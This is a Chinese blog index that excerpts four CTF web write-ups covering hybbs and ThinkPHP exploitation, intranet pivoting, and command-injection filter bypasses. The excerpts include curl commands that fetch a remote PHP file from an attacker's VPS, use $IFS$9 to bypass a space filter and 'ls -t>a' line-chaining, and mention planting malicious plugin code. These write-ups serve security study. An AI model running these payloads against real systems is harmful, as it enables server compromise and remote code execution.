![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF-WEB
虾搞搞
做一个好色有度,流氓有谱的男银儿~~~~~
展开
-
CTF-伟大宝宝的保障-WP
CTF-伟大宝宝的保障-WP题目来自BMZCTF,打开题目是hybbs2.3.2的,直接百度搜索相关漏洞即可利用漏洞:1.越权遍历给admin发私信,得到密码baobao(后9位需爆破)2.修改全局配置-上传后缀加php(这个方法已经失效,题目被改过)3.利用插件插入php代码解题过程首先越权给admin发送私信,其实这里算是遍历admin的uid为1,尝试发送得到一个密码反馈进行爆破得到admin密码为baobao123456789,进入后台插件新增插入恶意代码:111','原创 2020-11-18 10:21:56 · 417 阅读 · 2 评论 -
CTF-内网1-Wp
CTF-内网1-wp题目考点是tp命令执行+反弹出网+内网渗透+提权解题过程这个题目花了一天时间才弄完上半天:拿到环境后打开tp5的命令执行,一开始想着命令执行反弹shell,但是没有成功后面就开始翻文件,数据库配置文件,内网吗,应该要继续搞这台连接数据库后,是个假的Sa吧,不过还好可以执行命令,查看了一下有好几个用户呢,hack,test,administrator,guest等等,不过这都不是重点(我还爆破了hack跟test,想着是不是这两个用户提权到administrator),居然p原创 2020-10-30 00:14:00 · 593 阅读 · 0 评论 -
CTF-shell_exec-Wp
CTF-shell_exec-Wp题目是这样的,ping命令测试查看html源代码看到一个tip解题过程一经过大量测试目的其实就是执行cat /flag但是发现有过滤了空格,这里我们$IFS$9代替我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php最终poc:#第一条,把vps的<?php system('cat /flag')>写进去a`echo$IFS$9curl$IFS$9112h原创 2020-10-29 20:31:38 · 1417 阅读 · 0 评论 -
CTF-Rcee命令执行-Wp
CTF-Rcee-WP这个题目挺考验你的积累与耐心哈哈哈我表示重启环境十几次才做好题目代码考点这里考点是:ls -t>a续行来突破限制我是在vps上创建一个文件,然后利用ip转换成其他进制来达到目的把curl 2033630300 >1.php利用ls -t >a写入a文件,然后再利用sh a执行命令可以发现我们vps的文件内容已经被目标机器写入了a.php访问a.php看看神奇的东西哈哈哈哈哈哈,表示第一次做这种题目,很好玩接下来就没技术含量了<?原创 2020-10-29 14:02:18 · 260 阅读 · 0 评论